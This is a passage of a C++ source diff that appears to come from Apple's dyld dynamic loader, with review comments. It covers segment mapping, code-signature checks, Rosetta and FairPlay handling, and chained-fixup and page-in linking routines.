&checkInfo); + if ( res == -1 ) { + // rdar://79796526 (include uuid of mis-signed binary to help debug) + char uuidStr[64]; + getUuidFromFd(state, fd, sliceOffset, uuidStr); + diag.error("code signature in <%s> '%s' not valid for use in process: %s", uuidStr, path, messageBuffer); + state.config.syscall.close(fd); + return nullptr; + } + } +#endif + +#if BUILDING_DYLD && SUPPORT_ROSETTA + // if translated, need to add in translated code segment + char aotPath[PATH_MAX]; + uint64_t extraAllocSize = 0; + if ( state.config.process.isTranslated ) { + int ret = aot_get_extra_mapping_info(fd, path, extraAllocSize, aotPath, sizeof(aotPath)); + 
// NOTE(review): under Rosetta the translated (AOT) code size is folded into
// the vm_allocate reservation below; then each non-zero-fill region is mmap'd
// MAP_FIXED into the reservation, with MAP_TPRO OR'd in for read-only data
// when TPRO is enabled, and the first segment is sanity-checked as a mach-o
// header.
if ( ret == 0 ) { + vmSpace += extraAllocSize; + } + else { + extraAllocSize = 0; + aotPath[0] = '\0'; + } + } +#endif + + // reserve address range + vm_address_t loadAddress = 0; + kern_return_t r = ::vm_allocate(mach_task_self(), &loadAddress, (vm_size_t)vmSpace, VM_FLAGS_ANYWHERE); + if ( r != KERN_SUCCESS ) { + diag.error("vm_allocate(size=0x%0llX) failed with result=%d", vmSpace, r); + state.config.syscall.close(fd); + return nullptr; + } + +#if BUILDING_DYLD + if ( state.config.log.segments ) { + if ( sliceOffset != 0 ) + state.log("Mapping %s (slice offset=0x%llX)\n", path, sliceOffset); + else + state.log("Mapping %s\n", path); + } +#endif + + // map each segment + bool mmapFailure = false; + const bool enableTpro = state.config.process.enableTproDataConst; + __block uint32_t segIndex = 0; + for ( const Region& region : regions ) { + // Mapping zero filled regions fails with mmap of size 0 + if ( region.isZeroFill || (region.fileSize == 0) ) + continue; + if ( (region.vmOffset == 0) && (segIndex > 0) ) + continue; + int perms = VM_PROT_READ; + int flags = MAP_FIXED | MAP_PRIVATE; + +#if BUILDING_DYLD + perms = region.perms; +#endif + if (enableTpro && region.readOnlyData) { + flags |= MAP_TPRO; + } + void* segAddress = state.config.syscall.mmap((void*)(loadAddress + region.vmOffset), (size_t)region.fileSize, perms, + flags, fd, (size_t)(sliceOffset + region.fileOffset)); + int mmapErr = errno; + if ( segAddress == MAP_FAILED ) { + if ( mmapErr == EPERM ) { + if ( state.config.syscall.sandboxBlockedMmap(path) ) + diag.error("file system sandbox blocked mmap() of '%s'", path); + else + diag.error("code signing blocked mmap() of '%s'", path); + } + else { + diag.error("mmap(addr=0x%0llX, size=0x%08X) failed with errno=%d for %s", loadAddress + region.vmOffset, + region.fileSize, mmapErr, path); + } + mmapFailure = true; + break; + } + + // sanity check first segment is mach-o header + if ( !mmapFailure && (segIndex == 0) ) { + const MachOAnalyzer* ma = 
// NOTE(review): tail of Loader::mapSegments — FairPlay-encrypted ranges are
// registered via mremap_encrypted(); any failure deallocates the whole
// reservation; under Rosetta the AOT image is mapped after the regular
// segments and recorded in the externally-viewable image list.
(MachOAnalyzer*)segAddress; + if ( !ma->isMachO(diag, region.fileSize) ) { + mmapFailure = true; + break; + } + } + if ( !mmapFailure ) { +#if BUILDING_DYLD + uintptr_t mappedSize = round_page((uintptr_t)region.fileSize); + uintptr_t mappedStart = (uintptr_t)segAddress; + uintptr_t mappedEnd = mappedStart + mappedSize; + if ( state.config.log.segments ) { + const MachOLoaded* lmo = (MachOLoaded*)loadAddress; + state.log("%14s (%c%c%c) 0x%012lX->0x%012lX\n", lmo->segmentName(segIndex), + (region.perms & PROT_READ) ? 'r' : '.', (region.perms & PROT_WRITE) ? 'w' : '.', (region.perms & PROT_EXEC) ? 'x' : '.', + mappedStart, mappedEnd); + } +#endif + } + ++segIndex; + } + +#if BUILDING_DYLD && !TARGET_OS_SIMULATOR && (__arm64__ || __arm__) + if ( !mmapFailure ) { + // tell kernel about fairplay encrypted regions + uint32_t fpTextOffset; + uint32_t fpSize; + const MachOAnalyzer* ma = (const MachOAnalyzer*)loadAddress; + // FIXME: record if FP info in PrebuiltLoader + if ( ma->isFairPlayEncrypted(fpTextOffset, fpSize) ) { + int result = state.config.syscall.mremap_encrypted((void*)(loadAddress + fpTextOffset), fpSize, 1, ma->cputype, ma->cpusubtype); + if ( result != 0 ) { + diag.error("could not register fairplay decryption, mremap_encrypted() => %d", result); + mmapFailure = true; + } + } + } +#endif + + if ( mmapFailure ) { + ::vm_deallocate(mach_task_self(), loadAddress, (vm_size_t)vmSpace); + state.config.syscall.close(fd); + return nullptr; + } + +#if BUILDING_DYLD && SUPPORT_ROSETTA + if ( state.config.process.isTranslated && (extraAllocSize != 0) ) { + // map in translated code at end of mapped segments + dyld_aot_image_info aotInfo; + uint64_t extraSpaceAddr = (long)loadAddress + vmSpace - extraAllocSize; + int ret = aot_map_extra(path, (mach_header*)loadAddress, (void*)extraSpaceAddr, aotInfo.aotLoadAddress, aotInfo.aotImageSize, aotInfo.aotImageKey); + if ( ret == 0 ) { + // fill in the load address, at this point the Rosetta trap has filled in the other fields 
// NOTE(review): end of mapSegments; below begin the userland chained-fixup
// page walkers used by the __map_with_linking_np (page-in linking) fallback.
+ aotInfo.x86LoadAddress = (mach_header*)loadAddress; + #if HAS_EXTERNAL_STATE + std::span aots(&aotInfo, 1); + // dyld automatically adds an entry to the image list when loading the dylib. + // Add an entry for the aot info but pass an empty std::span for the dyld image info + std::span infos; + state.externallyViewable.addRosettaImages(aots, infos); + #endif + if ( state.config.log.segments ) { + state.log("%14s (r.x) 0x%012llX->0x%012llX\n", "ROSETTA", extraSpaceAddr, extraSpaceAddr + extraAllocSize); + } + } + } +#endif + // close file + state.config.syscall.close(fd); + return (MachOAnalyzer*)loadAddress; +} +#endif // BUILDING_DYLD || BUILDING_CLOSURE_UTIL || BUILDING_UNIT_TESTS + +#if BUILDING_DYLD || BUILDING_UNIT_TESTS + +// can't do page-in linking with simulator until will know host OS will support it +#if !TARGET_OS_SIMULATOR && !TARGET_OS_EXCLAVEKIT + +static void fixupPage64(void* pageContent, const mwl_info_hdr* blob, const dyld_chained_starts_in_segment* segInfo, uint32_t pageIndex, bool offsetBased) +{ + const uint64_t* bindsArray = (uint64_t*)((uint8_t*)blob + blob->mwli_binds_offset); + uint16_t firstStartOffset = segInfo->page_start[pageIndex]; + // check marker for no fixups on the page + if ( firstStartOffset == DYLD_CHAINED_PTR_START_NONE ) + return; + uint64_t* chain = (uint64_t*)((uint8_t*)pageContent + firstStartOffset); + // walk chain + const uint64_t targetAdjust = (offsetBased ? 
// NOTE(review): fixupPage64 walks one page of a DYLD_CHAINED_PTR_64[_OFFSET]
// chain (4-byte stride), rewriting binds from the blob's bind table and
// rebases by image-address or slide depending on `offsetBased`; fixupChain32
// below handles the 32-bit format, including max_valid_pointer non-pointer
// entries.
blob->mwli_image_address : blob->mwli_slide); + uint64_t delta = 0; + do { + uint64_t value = *chain; + bool isBind = (value & 0x8000000000000000ULL); + delta = (value >> 51) & 0xFFF; + //fprintf(stderr, " offset=0x%08lX, chain=%p, value=0x%016llX, delta=%lld\n", (long)chain - (long)header, chain, value, delta); + if ( isBind ) { + // is bind + uint32_t bindOrdinal = value & 0x00FFFFFF; + if ( bindOrdinal >= blob->mwli_binds_count ) { + fprintf(stderr, "out of range bind ordinal %u (max %u)", bindOrdinal, blob->mwli_binds_count); + break; + } + else { + uint32_t addend = (value >> 24) & 0xFF; + *chain = bindsArray[bindOrdinal] + addend; + } + } + else { + // is rebase + uint64_t target = value & 0xFFFFFFFFFULL; + uint64_t high8 = (value >> 36) & 0xFF; + *chain = target + targetAdjust + (high8 << 56); + } + chain = (uint64_t*)((uint8_t*)chain + (delta*4)); // 4-byte stride + } while ( delta != 0 ); +} + + +static void fixupChain32(uint32_t* chain, const mwl_info_hdr* blob, const dyld_chained_starts_in_segment* segInfo, const uint32_t bindsArray[]) +{ + //fprintf(stderr, "fixupChain32(%p)\n", chain); + uint32_t delta = 0; + do { + uint32_t value = *chain; + delta = (value >> 26) & 0x1F; + //fprintf(stderr, " chain=%p, value=0x%08X, delta=%u\n", chain, value, delta); + if ( value & 0x80000000 ) { + // is bind + uint32_t bindOrdinal = value & 0x000FFFFF; + if ( bindOrdinal >= blob->mwli_binds_count ) { + fprintf(stderr, "out of range bind ordinal %u (max %u)", bindOrdinal, blob->mwli_binds_count); + break; + } + else { + uint32_t addend = (value >> 20) & 0x3F; + *chain = bindsArray[bindOrdinal] + addend; + } + } + else { + // is rebase + uint32_t target = value & 0x03FFFFFF; + if ( target > segInfo->max_valid_pointer ) { + // handle non-pointers in chain + uint32_t bias = (0x04000000 + segInfo->max_valid_pointer)/2; + *chain = target - bias; + } + else { + *chain = target + (uint32_t)blob->mwli_slide; + } + } + chain += delta; + } while ( delta != 0 ); +} + + +static 
// NOTE(review): fixupPage32 below handles DYLD_CHAINED_PTR_32 pages, including
// the DYLD_CHAINED_PTR_START_MULTI overflow list for pages whose fixups are
// too far apart for a single chain start; signPointer (ptrauth builds only)
// re-signs a pointer with the recorded key/diversity.
void fixupPage32(void* pageContent, const mwl_info_hdr* blob, const dyld_chained_starts_in_segment* segInfo, uint32_t pageIndex) +{ + const uint32_t* bindsArray = (uint32_t*)((uint8_t*)blob + blob->mwli_binds_offset); + uint16_t startOffset = segInfo->page_start[pageIndex]; + if ( startOffset == DYLD_CHAINED_PTR_START_NONE ) + return; + if ( startOffset & DYLD_CHAINED_PTR_START_MULTI ) { + // some fixups in the page are too far apart, so page has multiple starts + uint32_t overflowIndex = startOffset & ~DYLD_CHAINED_PTR_START_MULTI; + bool chainEnd = false; + while ( !chainEnd ) { + chainEnd = (segInfo->page_start[overflowIndex] & DYLD_CHAINED_PTR_START_LAST); + startOffset = (segInfo->page_start[overflowIndex] & ~DYLD_CHAINED_PTR_START_LAST); + uint32_t* chain = (uint32_t*)((uint8_t*)pageContent + startOffset); + fixupChain32(chain, blob, segInfo, bindsArray); + ++overflowIndex; + } + } + else { + uint32_t* chain = (uint32_t*)((uint8_t*)pageContent + startOffset); + fixupChain32(chain, blob, segInfo, bindsArray); + } + } + +#if __has_feature(ptrauth_calls) +static uint64_t signPointer(uint64_t unsignedAddr, void* loc, bool addrDiv, uint16_t diversity, ptrauth_key key) +{ + // don't sign NULL + if ( unsignedAddr == 0 ) + return 0; + + uint64_t extendedDiscriminator = diversity; + if ( addrDiv ) + extendedDiscriminator = __builtin_ptrauth_blend_discriminator(loc, extendedDiscriminator); + switch ( key ) { + case ptrauth_key_asia: + return (uint64_t)__builtin_ptrauth_sign_unauthenticated((void*)unsignedAddr, 0, extendedDiscriminator); + case ptrauth_key_asib: + return (uint64_t)__builtin_ptrauth_sign_unauthenticated((void*)unsignedAddr, 1, extendedDiscriminator); + case ptrauth_key_asda: + return (uint64_t)__builtin_ptrauth_sign_unauthenticated((void*)unsignedAddr, 2, extendedDiscriminator); + case ptrauth_key_asdb: + return (uint64_t)__builtin_ptrauth_sign_unauthenticated((void*)unsignedAddr, 3, extendedDiscriminator); + default: + assert(0 && "invalid signing 
key"); + } +} + +static void fixupPageAuth64(void* pageContent, const mwl_info_hdr* blob, const dyld_chained_starts_in_segment* segInfo, uint32_t pageIndex, bool offsetBased) +{ + //fprintf(stderr, "fixupPageAuth64(): pageContent=%p, blob=%p, segInfo=%p, pageIndex=%u\n", pageContent, blob, segInfo, pageIndex); + const uint64_t* bindsArray = (uint64_t*)((uint8_t*)blob + blob->mwli_binds_offset); + uint16_t firstStartOffset = segInfo->page_start[pageIndex]; + // check marker for no fixups on the page + if ( firstStartOffset == DYLD_CHAINED_PTR_START_NONE ) + return; + uint64_t* chain = (uint64_t*)((uint8_t*)pageContent + firstStartOffset); + // walk chain + const uint64_t targetAdjust = (offsetBased ? blob->mwli_image_address : blob->mwli_slide); + uint64_t delta = 0; + do { + uint64_t value = *chain; + delta = (value >> 51) & 0x7FF; + //fprintf(stderr, " chain=%p, value=0x%08llX, delta=%llu\n", chain, value, delta); + bool isAuth = (value & 0x8000000000000000ULL); + bool isBind = (value & 0x4000000000000000ULL); + if ( isAuth ) { + ptrauth_key key = (ptrauth_key)((value >> 49) & 0x3); + bool addrDiv = ((value & (1ULL << 48)) != 0); + uint16_t diversity = (uint16_t)((value >> 32) & 0xFFFF); + if ( isBind ) { + uint32_t bindOrdinal = value & 0x00FFFFFF; + if ( bindOrdinal >= blob->mwli_binds_count ) { + fprintf(stderr, "out of range bind ordinal %u (max %u)", bindOrdinal, blob->mwli_binds_count); + break; + } + else { + *chain = signPointer(bindsArray[bindOrdinal], chain, addrDiv, diversity, key); + } + } + else { + /* note: in auth rebases only have 32-bits, so target is always offset - never vmaddr */ + uint64_t target = (value & 0xFFFFFFFF) + blob->mwli_image_address; + *chain = signPointer(target, chain, addrDiv, diversity, key); + } + } + else { + if ( isBind ) { + uint32_t bindOrdinal = value & 0x00FFFFFF; + if ( bindOrdinal >= blob->mwli_binds_count ) { + fprintf(stderr, "out of range bind ordinal %u (max %u)", bindOrdinal, blob->mwli_binds_count); + break; + } 
// NOTE(review): continuing fixupPageAuth64 (arm64e) — non-auth binds carry a
// sign-extended 19-bit addend; non-auth rebases reassemble the top-8 bits
// shifted back into place before adding targetAdjust.
+ else { + uint64_t addend19 = (value >> 32) & 0x0007FFFF; + if ( addend19 & 0x40000 ) + addend19 |= 0xFFFFFFFFFFFC0000ULL; + *chain = bindsArray[bindOrdinal] + addend19; + } + } + else { + uint64_t target = (value & 0x7FFFFFFFFFFULL); + uint64_t high8 = (value << 13) & 0xFF00000000000000ULL; + *chain = target + targetAdjust + high8; + } + } + chain += delta; + } while ( delta != 0 ); +} +#endif // __has_feature(ptrauth_calls) + + +static void fixupPage(void* pageContent, uint64_t userlandAddress, const mwl_info_hdr* blob) +{ + // find seg info and page within segment + const dyld_chained_starts_in_segment* segInfo = nullptr; + uint32_t pageIndex = 0; + const dyld_chained_starts_in_image* startsInfo = (dyld_chained_starts_in_image*)((uint8_t*)blob + blob->mwli_chains_offset); + for (uint32_t segIndex=0; segIndex < startsInfo->seg_count; ++segIndex) { + const dyld_chained_starts_in_segment* seg = (dyld_chained_starts_in_segment*)((uint8_t*)startsInfo + startsInfo->seg_info_offset[segIndex]); + uint64_t segStartAddress = (blob->mwli_image_address + seg->segment_offset); + uint64_t segEndAddress = segStartAddress + seg->page_count * seg->page_size; + if ( (segStartAddress <= userlandAddress) && (userlandAddress < segEndAddress) ) { + segInfo = seg; + pageIndex = (uint32_t)((userlandAddress-segStartAddress)/(seg->page_size)); + break; + } + } + //fprintf(stderr, "fixupPage(%p), blob=%p, pageIndex=%d, segInfo=%p\n", pageContent, blob, pageIndex, segInfo); + assert(segInfo != nullptr); + + switch (blob->mwli_pointer_format) { +#if __has_feature(ptrauth_calls) + case DYLD_CHAINED_PTR_ARM64E: + fixupPageAuth64(pageContent, blob, segInfo, pageIndex, false); + break; + case DYLD_CHAINED_PTR_ARM64E_USERLAND: + case DYLD_CHAINED_PTR_ARM64E_USERLAND24: + fixupPageAuth64(pageContent, blob, segInfo, pageIndex, true); + break; +#endif + case DYLD_CHAINED_PTR_64: + fixupPage64(pageContent, blob, segInfo, pageIndex, false); + break; + case DYLD_CHAINED_PTR_64_OFFSET: + 
// NOTE(review): fixupPage dispatches on mwli_pointer_format to the per-format
// walkers above (auth formats only when ptrauth is compiled in);
// dyld_map_with_linking_np below is the userland re-implementation of the
// __map_with_linking_np syscall — it sanity-checks the blob (version 7, bind
// table and chain info within blobSize) then fixes up every page of every
// segment in-process.
fixupPage64(pageContent, blob, segInfo, pageIndex, true); + break; + case DYLD_CHAINED_PTR_32: + fixupPage32(pageContent, blob, segInfo, pageIndex); + break; + } +} + +// implement __map_with_linking_np() in userland +static int dyld_map_with_linking_np(const mwl_region regions[], uint32_t regionCount, const mwl_info_hdr* blob, uint32_t blobSize) +{ + // sanity check + if ( blob->mwli_version != 7 ) + return -1; + uint32_t pointerSize = (blob->mwli_pointer_format == DYLD_CHAINED_PTR_32) ? 4 : 8; + if ( (blob->mwli_binds_offset + pointerSize*blob->mwli_binds_count) > blobSize ) { + fprintf(stderr, "bind table extends past blob, blobSize=%d, offset=%d, count=%d\n", blobSize, blob->mwli_binds_offset, blob->mwli_binds_count); + return -1; + } + if ( (blob->mwli_chains_offset + blob->mwli_chains_size) > blobSize ) + return -1; + + // apply fixups to each page in each page + const dyld_chained_starts_in_image* startsInfo = (dyld_chained_starts_in_image*)((uint8_t*)blob + blob->mwli_chains_offset); + //fprintf(stderr, "dyld_map_with_linking_np(), startsInfo=%p, seg_count=%d\n", startsInfo, startsInfo->seg_count); + for (uint32_t s=0; s < startsInfo->seg_count; ++s) { + if ( uint32_t segOffset = startsInfo->seg_info_offset[s] ) { + const dyld_chained_starts_in_segment* segInfo = (dyld_chained_starts_in_segment*)((uint8_t*)startsInfo + segOffset); + uint8_t* segStartAddress = (uint8_t*)(blob->mwli_image_address + segInfo->segment_offset); + //fprintf(stderr, "dyld_map_with_linking_np(), segStartAddress=%p, page_count=%d\n", segStartAddress, segInfo->page_count); + for (uint32_t i=0; i < segInfo->page_count; ++i) { + void* content = (void*)(uintptr_t)(segStartAddress + i*blob->mwli_page_size); + fixupPage(content, (uintptr_t)content, blob); + } + } + } + return 0; +} + +struct PageInLinkingRange { mwl_region region; const char* segName; const dyld_chained_starts_in_segment* chainInfo; }; + +// Note: disable tail call optimization, otherwise tailcall may remove stack 
allocated blob +[[clang::disable_tail_calls]] static +int setUpPageInLinkingRegions(RuntimeState& state, const Loader* ldr, uintptr_t slide, uint16_t pointer_format, uint16_t pageSize, + bool forceDyldBinding, const Array& ranges, const Array& bindTargets) +{ + // create blob on the stack + uint32_t chainInfoSize = (uint32_t)offsetof(dyld_chained_starts_in_image, seg_info_offset[ranges.count()]); + for (const PageInLinkingRange& range : ranges) { + chainInfoSize += range.chainInfo->size; + chainInfoSize = (chainInfoSize + 3) & (-4); // size should always be 4-byte aligned + } + uint32_t pointerSize = (pointer_format == DYLD_CHAINED_PTR_32) ? 4 : 8; + uint32_t bindsOffset = (sizeof(mwl_info_hdr) + chainInfoSize + 7) & (-8); // 8-byte align + size_t blobAllocationSize = bindsOffset + pointerSize*bindTargets.count(); + uint8_t buffer[blobAllocationSize]; + bzero(buffer,blobAllocationSize); + mwl_info_hdr* blob = (mwl_info_hdr*)buffer; + blob->mwli_version = 7; + blob->mwli_page_size = pageSize; + blob->mwli_pointer_format = pointer_format; + blob->mwli_binds_offset = bindsOffset; + blob->mwli_binds_count = (uint32_t)bindTargets.count(); + blob->mwli_chains_offset = sizeof(mwl_info_hdr); + blob->mwli_chains_size = chainInfoSize; + blob->mwli_slide = slide; + blob->mwli_image_address = (uintptr_t)ldr->loadAddress(state); + ::memcpy(&buffer[blob->mwli_binds_offset], bindTargets.begin(), pointerSize * blob->mwli_binds_count); + uint32_t offsetInChainInfo = (uint32_t)offsetof(dyld_chained_starts_in_image, seg_info_offset[ranges.count()]); + uint32_t rangeIndex = 0; + dyld_chained_starts_in_image* starts = (dyld_chained_starts_in_image*)((uint8_t*)blob + blob->mwli_chains_offset); + starts->seg_count = (uint32_t)ranges.count(); + for (const PageInLinkingRange& range : ranges) { + starts->seg_info_offset[rangeIndex] = offsetInChainInfo; + ::memcpy(&buffer[blob->mwli_chains_offset + offsetInChainInfo], range.chainInfo, range.chainInfo->size); + ++rangeIndex; + 
// NOTE(review): continuing setUpPageInLinkingRegions — after copying the
// per-segment chain info into the stack blob it either applies fixups
// in-process (dyld_map_with_linking_np, when forceDyldBinding) or hands the
// regions to the kernel via __map_with_linking_np, falling back to in-process
// linking if the syscall fails.
offsetInChainInfo += range.chainInfo->size; + } + STACK_ALLOC_ARRAY(mwl_region, regions, ranges.count()); + for (const PageInLinkingRange& range : ranges) { + regions.push_back(range.region); + } + + int result = 0; + if ( forceDyldBinding ) { + result = dyld_map_with_linking_np(regions.begin(), (uint32_t)regions.count(), blob, (uint32_t)blobAllocationSize); + } + else { + if ( state.config.log.fixups || state.config.log.segments ) { + state.log("Setting up kernel page-in linking for %s\n", ldr->path()); + for (const PageInLinkingRange& range : ranges) { + state.log("%14s (%c%c%c) 0x%012llX->0x%012llX (fileOffset=0x%0llX, size=%lluKB)\n", range.segName, + ((range.region.mwlr_protections & 1) ? 'r' : '.'), ((range.region.mwlr_protections & 2) ? 'w' : '.'), ((range.region.mwlr_protections & 4) ? 'x' : '.'), + range.region.mwlr_address, range.region.mwlr_address + range.region.mwlr_size, range.region.mwlr_file_offset, range.region.mwlr_size/1024); + } + } +#if BUILDING_DYLD + result = __map_with_linking_np(regions.begin(), (uint32_t)regions.count(), blob, (uint32_t)blobAllocationSize); + if ( result != 0 ) { + // kernel backed page-in linking failed, manually do fixups in-process + if ( state.config.log.fixups || state.config.log.segments ) + state.log("__map_with_linking_np(%s) failed, falling back to linking in-process\n", ldr->path()); + result = dyld_map_with_linking_np(regions.begin(), (uint32_t)regions.count(), blob, (uint32_t)blobAllocationSize); + } +#endif + } + return result; +} + + +void Loader::setUpPageInLinking(Diagnostics& diag, RuntimeState& state, uintptr_t slide, uint64_t sliceOffset, const Array& bindTargets) const +{ + int fd = state.config.syscall.open(this->path(), O_RDONLY, 0); + if ( fd == -1 ) { + diag.error("open(\"%s\", O_RDONLY) failed with errno=%d", this->path(), errno); + return; + } + // don't use page-in linking after libSystem is initialized + // don't use page-in linking if process has a sandbox that disables syscall + bool 
// NOTE(review): continuing Loader::setUpPageInLinking — kernel page-in linking
// is only attempted when pageInLinkingMode >= 2, libSystem is not yet
// initialized, and the sandbox permits the syscall; segments are partitioned
// between kernel-handled regions (bounded by MWL_MAX_REGION_COUNT) and
// dyld-handled regions, with per-segment pointer_format/page_size consistency
// checks. applyFixupsGeneric at the end of this chunk is truncated here.
canUsePageInLinkingSyscall = (state.config.process.pageInLinkingMode >= 2) && (state.libSystemHelpers == nullptr) && !state.config.syscall.sandboxBlockedPageInLinking(); + const MachOAnalyzer* ma = (MachOAnalyzer*)this->loadAddress(state); + const bool enableTpro = state.config.process.enableTproDataConst; + __block uint16_t format = 0; + __block uint16_t pageSize = 0; + STACK_ALLOC_OVERFLOW_SAFE_ARRAY(PageInLinkingRange, kernelPageInRegionInfo, 8); + STACK_ALLOC_OVERFLOW_SAFE_ARRAY(PageInLinkingRange, dyldPageInRegionInfo, 8); + ma->withChainStarts(diag, ma->chainStartsOffset(), ^(const dyld_chained_starts_in_image* startsInfo) { + // build mwl_region array and compute page starts size + __block const dyld_chained_starts_in_segment* lastSegChainInfo = nullptr; + ma->forEachSegment(^(const MachOAnalyzer::SegmentInfo& segInfo, bool& stop) { + if ( segInfo.segIndex < startsInfo->seg_count ) { + if ( startsInfo->seg_info_offset[segInfo.segIndex] == 0 ) { + return; + } + const dyld_chained_starts_in_segment* segChainInfo = (dyld_chained_starts_in_segment*)((uint8_t*)startsInfo + startsInfo->seg_info_offset[segInfo.segIndex]); + if ( format == 0 ) { + format = segChainInfo->pointer_format; + } + else if ( format != segChainInfo->pointer_format ) { + diag.error("pointer_format is different in different segments"); + stop = true; + } + if ( pageSize == 0 ) { + pageSize = segChainInfo->page_size; + } + else if ( pageSize != segChainInfo->page_size ) { + diag.error("page_size is different in different segments"); + stop = true; + } + PageInLinkingRange rangeInfo; + rangeInfo.region.mwlr_fd = fd; + rangeInfo.region.mwlr_protections = segInfo.protections; // Note: DATA_CONST is r/w at this point, so objc can do its fixups + rangeInfo.region.mwlr_file_offset = segInfo.fileOffset + sliceOffset; + rangeInfo.region.mwlr_address = segInfo.vmAddr + slide; + rangeInfo.region.mwlr_size = pageSize * segChainInfo->page_count; // in case some pages don't have fixups, don't use segment 
size + rangeInfo.segName = segInfo.segName; + rangeInfo.chainInfo = segChainInfo; + if ( canUsePageInLinkingSyscall ) { + // this is where we tune which fixups are done by the kernel + // currently only single page DATA segments are done by dyld + // the kernel only supports 5 regions per syscall, so any segments past that are fixed up by dyld + if ( (segInfo.readOnlyData || (segChainInfo->page_count > 1)) && (kernelPageInRegionInfo.count() < MWL_MAX_REGION_COUNT) ) { + if (enableTpro && segInfo.readOnlyData) { + rangeInfo.region.mwlr_protections |= VM_PROT_TPRO; + } + kernelPageInRegionInfo.push_back(rangeInfo); + } + else + dyldPageInRegionInfo.push_back(rangeInfo); + } + else { + dyldPageInRegionInfo.push_back(rangeInfo); + } + lastSegChainInfo = segChainInfo; + } + }); + // image has not DATA pages to page-in link, so do nothing + if ( lastSegChainInfo == nullptr ) + return; + + if ( !kernelPageInRegionInfo.empty() ) { + int kernResult = setUpPageInLinkingRegions(state, this, slide, format, pageSize, (state.config.process.pageInLinkingMode == 1), kernelPageInRegionInfo, bindTargets); + // if kernel can't do page in linking, then have dyld do the fixups + if ( kernResult != 0 ) + setUpPageInLinkingRegions(state, this, slide, format, pageSize, true, kernelPageInRegionInfo, bindTargets); + } + if ( !dyldPageInRegionInfo.empty() ) + setUpPageInLinkingRegions(state, this, slide, format, pageSize, true, dyldPageInRegionInfo, bindTargets); + }); + + state.config.syscall.close(fd); +} +#endif // !TARGET_OS_SIMULATOR && !TARGET_OS_EXCLAVEKIT + +void Loader::applyFixupsGeneric(Diagnostics& diag, RuntimeState& state, uint64_t sliceOffset, const Array& bindTargets, + const Array& overrideBindTargets, bool laziesMustBind, + const Array& missingFlatLazySymbols) const +{ + const MachOAnalyzer* ma = (MachOAnalyzer*)this->loadAddress(state); + const uintptr_t slide = ma->getSlide(); + if ( ma->hasChainedFixups() ) { + bool applyFixupsNow = true; +#if !TARGET_OS_SIMULATOR && 
!TARGET_OS_EXCLAVEKIT + // only do page in linking, if binary has standard chained fixups, config allows, and not so many targets that is wastes wired memory + if ( (state.config.process.pageInLinkingMode != 0) && ma->hasChainedFixupsLoadCommand() && (bindTargets.count() < 10000) ) { + this->setUpPageInLinking(diag, state, slide, sliceOffset, bindTargets); + // if we cannot do page-in-linking, then do fixups now + applyFixupsNow = diag.hasError(); + diag.clearError(); + } +#endif // !TARGET_OS_SIMULATOR && !TARGET_OS_EXCLAVEKIT + if ( applyFixupsNow ) { + // walk all chains + ma->withChainStarts(diag, ma->chainStartsOffset(), ^(const dyld_chained_starts_in_image* startsInfo) { + ma->fixupAllChainedFixups(diag, startsInfo, slide, bindTargets, ^(void* loc, void* newValue) { + if ( state.config.log.fixups ) + state.log("fixup: *0x%012lX = 0x%012lX\n", (uintptr_t)loc, (uintptr_t)newValue); + *((uintptr_t*)loc) = (uintptr_t)newValue; + }); + }); + } + } + else if ( ma->hasOpcodeFixups() ) { + // process all rebase opcodes + ma->forEachRebaseLocation_Opcodes(diag, ^(uint64_t runtimeOffset, bool& stop) { + uintptr_t* loc = (uintptr_t*)((uint8_t*)ma + runtimeOffset); + uintptr_t locValue = *loc; + uintptr_t newValue = locValue + slide; + if ( state.config.log.fixups ) + state.log("fixup: *0x%012lX = 0x%012lX \n", (uintptr_t)loc, (uintptr_t)newValue); + *loc = newValue; + }); + if ( diag.hasError() ) + return; + + // process all bind opcodes + ma->forEachBindLocation_Opcodes(diag, ^(uint64_t runtimeOffset, unsigned targetIndex, bool& stop) { + uintptr_t* loc = (uintptr_t*)((uint8_t*)ma + runtimeOffset); + uintptr_t newValue = (uintptr_t)(bindTargets[targetIndex]); + + if ( state.config.log.fixups ) + state.log("fixup: *0x%012lX = 0x%012lX <%s/bind#%u>\n", (uintptr_t)loc, (uintptr_t)newValue, this->leafName(), targetIndex); + *loc = newValue; + +#if !TARGET_OS_EXCLAVEKIT + // Record missing lazy symbols + if ( newValue == (uintptr_t)state.libdyldMissingSymbol ) { + for 
(const MissingFlatLazySymbol& missingSymbol : missingFlatLazySymbols) { + if ( missingSymbol.bindTargetIndex == targetIndex ) { + state.addMissingFlatLazySymbol(this, missingSymbol.symbolName, loc); + break; + } + } + } +#endif // !TARGET_OS_EXCLAVEKIT + }, ^(uint64_t runtimeOffset, unsigned overrideBindTargetIndex, bool& stop) { + uintptr_t* loc = (uintptr_t*)((uint8_t*)ma + runtimeOffset); + uintptr_t newValue = (uintptr_t)(overrideBindTargets[overrideBindTargetIndex]); + + // Skip missing weak binds + if ( newValue == UINTPTR_MAX ) { + if ( state.config.log.fixups ) + state.log("fixup: *0x%012lX (skipping missing weak bind) <%s/weak-bind#%u>\n", (uintptr_t)loc, this->leafName(), overrideBindTargetIndex); + return; + } + + if ( state.config.log.fixups ) + state.log("fixup: *0x%012lX = 0x%012lX <%s/weak-bind#%u>\n", (uintptr_t)loc, (uintptr_t)newValue, this->leafName(), overrideBindTargetIndex); + *loc = newValue; + }); + } +#if SUPPORT_CLASSIC_RELOCS + else { + // process internal relocations + ma->forEachRebaseLocation_Relocations(diag, ^(uint64_t runtimeOffset, bool& stop) { + uintptr_t* loc = (uintptr_t*)((uint8_t*)ma + runtimeOffset); + uintptr_t locValue = *loc; + uintptr_t newValue = locValue + slide; + if ( state.config.log.fixups ) + state.log("fixup: *0x%012lX = 0x%012lX \n", (uintptr_t)loc, (uintptr_t)newValue); + *loc = newValue; + }); + if ( diag.hasError() ) + return; + + // process external relocations + ma->forEachBindLocation_Relocations(diag, ^(uint64_t runtimeOffset, unsigned targetIndex, bool& stop) { + uintptr_t* loc = (uintptr_t*)((uint8_t*)ma + runtimeOffset); + uintptr_t newValue = (uintptr_t)(bindTargets[targetIndex]); + if ( state.config.log.fixups ) + state.log("fixup: *0x%012lX = 0x%012lX <%s/bind#%u>\n", (uintptr_t)loc, (uintptr_t)newValue, this->leafName(), targetIndex); + *loc = newValue; + }); + } +#endif // SUPPORT_CLASSIC_RELOCS +} + +void Loader::findAndRunAllInitializers(RuntimeState& state) const +{ + Diagnostics diag; + const 
